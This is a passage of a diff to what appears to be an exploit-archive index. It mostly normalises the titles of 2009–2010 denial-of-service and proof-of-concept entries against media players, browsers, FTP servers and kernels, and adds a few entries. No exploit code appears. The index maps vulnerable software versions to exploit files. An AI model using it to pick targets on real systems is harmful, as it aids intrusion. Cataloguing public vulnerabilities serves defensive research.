1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service",2009-05-18,"Jon Oberheide",multiple,dos,0 @@ -1065,7 +1065,7 @@ id,file,description,date,author,platform,type,port 8822,platforms/multiple/dos/8822.txt,"Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service",2009-05-29,"Thierry Zoller",multiple,dos,0 8826,platforms/multiple/dos/8826.txt,"Adobe Acrobat 9.1.1 (OSX/Windows) - Stack Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos,0 8832,platforms/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote Buffer Overflow (PoC)",2009-06-01,Nine:Situations:Group,windows,dos,0 -8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow PoC (SEH)",2009-06-01,LiquidWorm,windows,dos,0 +8837,platforms/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)",2009-06-01,LiquidWorm,windows,dos,0 8842,platforms/multiple/dos/8842.pl,"Apache mod_dav / svn - Remote Denial of Service",2009-06-01,kingcope,multiple,dos,0 8862,platforms/windows/dos/8862.txt,"Apple QuickTime - Image Description Atom Sign Extension (PoC)",2009-06-03,webDEViL,windows,dos,0 8873,platforms/multiple/dos/8873.c,"OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service",2009-06-04,"Jon Oberheide",multiple,dos,0 @@ -1087,11 +1087,11 @@ id,file,description,date,author,platform,type,port 9067,platforms/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service",2009-07-01,Stack,hardware,dos,0 9071,platforms/multiple/dos/9071.txt,"Apple Safari 4.x - JavaScript Reload Remote Crash",2009-07-02,SkyOut,multiple,dos,0 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié",windows,dos,0 -9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC",2009-07-09,kingcope,multiple,dos,0 +9085,platforms/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)",2009-07-09,kingcope,multiple,dos,0 9090,platforms/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos,0 9100,platforms/windows/dos/9100.html,"Microsoft Internet Explorer - (AddFavorite) Remote Crash (PoC)",2009-07-09,Sberry,windows,dos,0 9102,platforms/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,windows,dos,0 -9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs",2009-07-10,Stack,windows,dos,0 +9113,platforms/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflow (PoCs)",2009-07-10,Stack,windows,dos,0 9114,platforms/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos,0 9116,platforms/windows/dos/9116.html,"AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos,0 9123,platforms/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0 @@ -1099,6 +1099,7 @@ id,file,description,date,author,platform,type,port 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - (USER) Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0 9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0 +9139,platforms/windows/dos/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,dos,0 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0 9157,platforms/windows/dos/9157.pl,"Hamster Audio Player 0.3a - Local Buffer Overflow (PoC)",2009-07-15,"ThE g0bL!N",windows,dos,0 @@ -1112,8 +1113,8 @@ id,file,description,date,author,platform,type,port 9173,platforms/windows/dos/9173.pl,"MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)",2009-07-16,hack4love,windows,dos,0 9175,platforms/multiple/dos/9175.txt,"Sguil/PADS - Remote Server Crash",2009-07-17,Ataraxia,multiple,dos,0 9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos,0 -9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - (skin) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 -9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - (SKIN) Local Stack Overflow PoC (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 +9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 +9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0 @@ -1139,6 +1140,7 @@ id,file,description,date,author,platform,type,port 9359,platforms/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Buffer Overflow (PoC)",2009-08-04,hack4love,windows,dos,0 9361,platforms/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor - '.mnu' Stack Overflow (PoC)",2009-08-04,"Pankaj Kohli",windows,dos,0 9362,platforms/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 - Simple HTML Remote Crash (PoC)",2009-08-05,schnuddelbuddel,windows,dos,0 +9364,platforms/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,windows,dos,0 9368,platforms/windows/dos/9368.pl,"UltraPlayer Media Player 2.112 - Local Buffer Overflow (PoC)",2009-08-05,SarBoT511,windows,dos,0 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service",2009-08-06,"Shaun Colley",freebsd,dos,0 9376,platforms/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - (M3U/ASX/WAX/WVX) Local Crash (PoC)",2009-09-10,Dr_IDE,windows,dos,0 @@ -1153,7 +1155,7 @@ id,file,description,date,author,platform,type,port 9427,platforms/windows/dos/9427.py,"VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos,0 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",linux,dos,0 -9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow PoC (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 +9446,platforms/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH)",2009-08-18,"fl0 fl0w",windows,dos,0 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client - 'tgbvpn.sys' Local Denial of Service",2009-08-18,Evilcry,windows,dos,0 9454,platforms/multiple/dos/9454.txt,"Apple Safari 4.0.2 - WebKit Parsing of Floating Point Numbers Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos,0 9455,platforms/windows/dos/9455.html,"Microsoft Internet Explorer - (JavaScript SetAttribute) Remote Crash",2009-08-18,"Irfan Asrar",windows,dos,0 @@ -1178,8 +1180,8 @@ id,file,description,date,author,platform,type,port 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - (MobileSafari) Crash + Reboot Exploit",2009-08-31,TheLeader,windows,dos,0 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,windows,dos,0 9573,platforms/windows/dos/9573.pl,"dTunes 2.72 - (Filename Processing) Local Format String (PoC)",2009-09-01,TheLeader,windows,dos,0 -9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (1)",2009-09-03,"expose 0day",windows,dos,0 -9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow PoC (2)",2009-09-03,"expose 0day",windows,dos,0 +9584,platforms/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1)",2009-09-03,"expose 0day",windows,dos,0 +9585,platforms/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (2)",2009-09-03,"expose 0day",windows,dos,0 9587,platforms/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - (Stack Exhaustion) Denial of Service",2009-09-04,kingcope,windows,dos,0 9594,platforms/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos,0 9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos,0 @@ -1213,7 +1215,7 @@ id,file,description,date,author,platform,type,port 9707,platforms/windows/dos/9707.pl,"Ease Audio Cutter 1.20 - '.wav' Local Crash (PoC)",2009-09-17,zAx,windows,dos,0 9717,platforms/windows/dos/9717.txt,"Xerver HTTP Server 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos,0 9731,platforms/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos,0 -9734,platforms/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow PoC (2)",2009-09-21,Dr_IDE,windows,dos,0 +9734,platforms/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)",2009-09-21,Dr_IDE,windows,dos,0 9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 - Denial of Service (Metasploit)",2009-11-10,zhangmc,windows,dos,21 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation (PoC)",2009-09-29,pyrokinesis,windows,dos,0 9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - Denial of Service",2009-09-28,Dr_IDE,windows,dos,21 @@ -1223,7 +1225,7 @@ id,file,description,date,author,platform,type,port 9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0 9874,platforms/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos,0 9879,platforms/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,windows,dos,7144 -9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,dos,110 +9881,platforms/windows/dos/9881.txt,"Eureka Email Client 2.2q - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,dos,110 9901,platforms/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - Denial of Service (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80 9956,platforms/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - Denial of Service",2009-10-14,"Townsend Harris",hardware,dos,0 9969,platforms/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 Denial of Service",2009-10-23,"laurent gaffie",multiple,dos,0 @@ -1232,7 +1234,7 @@ id,file,description,date,author,platform,type,port 9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 10004,platforms/multiple/dos/10004.txt,"Dopewars Server 1.5.12 - Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 -10005,platforms/windows/dos/10005.py,"Microsoft Windows 7 / Server 2008 R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 +10005,platforms/windows/dos/10005.py,"Microsoft Windows 7 / 2008 R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0 10022,platforms/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos,0 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389 @@ -1294,7 +1296,7 @@ id,file,description,date,author,platform,type,port 10593,platforms/windows/dos/10593.txt,"Winamp 5.57 - Stack Overflow",2009-12-22,scriptjunkie,windows,dos,0 10603,platforms/windows/dos/10603.c,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service",2009-12-22,Socket_0x03,windows,dos,0 10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0 -10634,platforms/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow Denial of Service/PoC",2009-12-24,sandman,linux,dos,0 +10634,platforms/linux/dos/10634.txt,"Picpuz 2.1.1 - Buffer Overflow Denial of Service (PoC)",2009-12-24,sandman,linux,dos,0 10650,platforms/windows/dos/10650.pl,"jetAudio 8.0.0.0 - '.asx' Basic Local Crash (PoC)",2009-12-25,"D3V!L FUCKER",windows,dos,0 10651,platforms/windows/dos/10651.pl,"JetAudio Basic 7.5.5.25 - '.asx' Buffer Overflow (PoC)",2009-12-25,"D3V!L FUCKER",windows,dos,0 10820,platforms/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,php,dos,80 @@ -1318,7 +1320,7 @@ id,file,description,date,author,platform,type,port 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos,0 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0 -11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 +11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Sony Ericsson Phones Denial of Service (PoC)",2010-01-06,Aodrulez,hardware,dos,0 11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",linux,dos,0 11052,platforms/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service (PoC)",2010-01-07,anonymous,windows,dos,0 11053,platforms/windows/dos/11053.py,"ttplayer 5.6Beta3 - Denial of Service (PoC)",2010-01-07,"t-bag YDteam",windows,dos,0 @@ -1356,7 +1358,7 @@ id,file,description,date,author,platform,type,port 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - '.mp3' / '.pls' Local Crash (PoC)",2010-01-22,cr4wl3r,windows,dos,0 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote Denial of Service/Crash",2010-01-22,"Zer0 Thunder",windows,dos,0 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0 -11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption PoC/Denial of Service",2010-01-24,d3b4g,windows,dos,0 +11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption (PoC) / Denial of Service",2010-01-24,d3b4g,windows,dos,0 11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0 11248,platforms/windows/dos/11248.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow (PoC)",2010-01-24,Debug,windows,dos,0 11254,platforms/windows/dos/11254.pl,"P2GChinchilla HTTP Server 1.1.1 - Denial of Service",2010-01-24,"Zer0 Thunder",windows,dos,0 @@ -1402,13 +1404,13 @@ id,file,description,date,author,platform,type,port 11537,platforms/windows/dos/11537.pl,"Chasys Media Player 1.1 - '.mid' Local Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0 11540,platforms/windows/dos/11540.pl,"Total Video Player 1.31 - '.wav' Local Crash",2010-02-22,v3n0m,windows,dos,0 11541,platforms/windows/dos/11541.pl,"Total Video Player 1.31 - '.avi' Local Crash (PoC)",2010-02-22,diving,windows,dos,0 -11546,platforms/hardware/dos/11546.py,"iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service/PoC",2010-02-23,b0telh0,hardware,dos,0 +11546,platforms/hardware/dos/11546.py,"iPhone FTP Server (WiFi FTP) by SavySoda - Denial of Service (PoC)",2010-02-23,b0telh0,hardware,dos,0 11552,platforms/hardware/dos/11552.pl,"iPhone FtpDisc 1.0 - Denial of Service",2010-02-23,Ale46,hardware,dos,0 11556,platforms/hardware/dos/11556.pl,"iPhone FTP Server By Zhang Boyang - Remote Denial of Service",2010-02-23,Ale46,hardware,dos,0 11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)",2010-02-24,"Rad L. Sneak",multiple,dos,0 11574,platforms/hardware/dos/11574.py,"iPhone - WebCore::CSSSelector() Remote Crash",2010-02-24,t12,hardware,dos,0 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox 3.6 - Denial of Service (2)",2010-02-27,Ale46,multiple,dos,0 -11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem - micro_httpd Denial of Service/PoC",2010-02-28,ad0nis,hardware,dos,0 +11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)",2010-02-28,ad0nis,hardware,dos,0 11601,platforms/windows/dos/11601.pl,"Apple Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service",2010-02-28,"John Cobb",windows,dos,0 11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FtpDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service",2010-03-01,"Alberto Ortega",hardware,dos,0 11617,platforms/windows/dos/11617.txt,"Opera / Mozilla Firefox 3.6 - Long String Crash",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 @@ -1454,7 +1456,7 @@ id,file,description,date,author,platform,type,port 11955,platforms/windows/dos/11955.py,"All to All Audio Convertor 2.0 - Files Stack Overflow (PoC)",2010-03-30,ITSecTeam,windows,dos,0 11959,platforms/windows/dos/11959.pl,"Xilisoft BlackBerry Ring Tone Maker - '.wma' Local Crash",2010-03-30,anonymous,windows,dos,0 11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 -11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' PoC",2010-03-30,"Richard leahy",windows,dos,0 +11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' (PoC)",2010-03-30,"Richard leahy",windows,dos,0 11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0 11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' SEH (PoC)",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0 @@ -1476,7 +1478,7 @@ id,file,description,date,author,platform,type,port 12093,platforms/hardware/dos/12093.txt,"McAfee Email Gateway (formerly IronMail) - Denial of Service",2010-04-06,"Nahuel Grisolia",hardware,dos,0 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos,0 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 - Denial of Service Multiple Files",2010-04-06,anonymous,windows,dos,0 -12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - '.zip' PoC (SEH)",2010-04-07,ITSecTeam,windows,dos,0 +12104,platforms/windows/dos/12104.py,"Anyzip 1.1 - '.zip' (PoC) (SEH)",2010-04-07,ITSecTeam,windows,dos,0 12109,platforms/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 @@ -1497,7 +1499,7 @@ id,file,description,date,author,platform,type,port 15732,platforms/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml config parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0 12252,platforms/hardware/dos/12252.txt,"IBM Bladecenter Management Module - Denial of Service",2010-04-15,"Alexey Sintsov",hardware,dos,0 -12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug PoC (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 +12258,platforms/windows/dos/12258.py,"Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)",2010-04-16,"laurent gaffie",windows,dos,0 12259,platforms/php/dos/12259.php,"PHP 5.3.x - Denial of Service",2010-04-16,ITSecTeam,php,dos,0 12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)",2010-04-17,"laurent gaffie",windows,dos,0 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 @@ -1558,12 +1560,12 @@ id,file,description,date,author,platform,type,port 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0 12698,platforms/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,windows,dos,0 12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)",2010-05-23,"sniper ip",windows,dos,0 -12740,platforms/windows/dos/12740.py,"Webby WebServer - PoC SEH control",2010-05-25,m-1-k-3,windows,dos,0 +12740,platforms/windows/dos/12740.py,"Webby WebServer - SEH Control (PoC)",2010-05-25,m-1-k-3,windows,dos,0 12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 -12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd - off-by one PoC (FreeBSD-SA-10:05)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 +12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off- By One (PoC)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0 12774,platforms/windows/dos/12774.py,"Home FTP Server 1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0 @@ -1614,7 +1616,7 @@ id,file,description,date,author,platform,type,port 14099,platforms/windows/dos/14099.py,"MemDb - Multiple Remote Denial of Service",2010-06-28,Markot,windows,dos,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - '.avi' Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 14121,platforms/multiple/dos/14121.c,"Adobe Reader 9.3.2 - 'CoolType.dll' Remote Memory Corruption / Denial of Service",2010-06-29,LiquidWorm,multiple,dos,0 -14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/Server 2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0 +14156,platforms/windows/dos/14156.txt,"Microsoft Windows Vista/2008 - NtUserCheckAccessForIntegrityLevel Use-After-Free",2010-07-01,MSRC,windows,dos,0 14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 - '.mp3' Local Stack Overflow (PoC)",2010-07-02,v3n0m,windows,dos,0 14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0 14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800 @@ -1650,7 +1652,7 @@ id,file,description,date,author,platform,type,port 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec - Denial of Service",2010-08-08,"Nishant Das Patnaik",windows,dos,0 14587,platforms/windows/dos/14587.py,"Visual MP3 Splitter & Joiner 6.1 - Denial of Service",2010-08-09,"Oh Yaw Theng",windows,dos,0 14584,platforms/windows/dos/14584.py,"QQ Computer Manager - 'TSKsp.sys' Local Denial of Service",2010-08-09,"Lufeng Li",windows,dos,0 -14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX PoC (SEH)",2010-08-09,s-dz,windows,dos,0 +14593,platforms/windows/dos/14593.htm,"AoAAudioExtractor 2.0.0.0 - ActiveX (PoC) (SEH)",2010-08-09,s-dz,windows,dos,0 14594,platforms/linux/dos/14594.py,"Linux Kernel 2.6.33.3 - SCTP INIT Remote Denial of Service",2010-08-09,"Jon Oberheide",linux,dos,0 14597,platforms/windows/dos/14597.py,"Mthree Development MP3 to WAV Decoder - Denial of Service",2010-08-10,"Oh Yaw Theng",windows,dos,0 14601,platforms/windows/dos/14601.py,"Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)",2010-08-10,anonymous,windows,dos,0 @@ -1767,7 +1769,7 @@ id,file,description,date,author,platform,type,port 15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0 15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0 15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0 -15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - Memory Corruption PoC (Simplified)",2010-10-28,extraexploit,multiple,dos,0 +15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - (Simplified) Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos,0 15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer 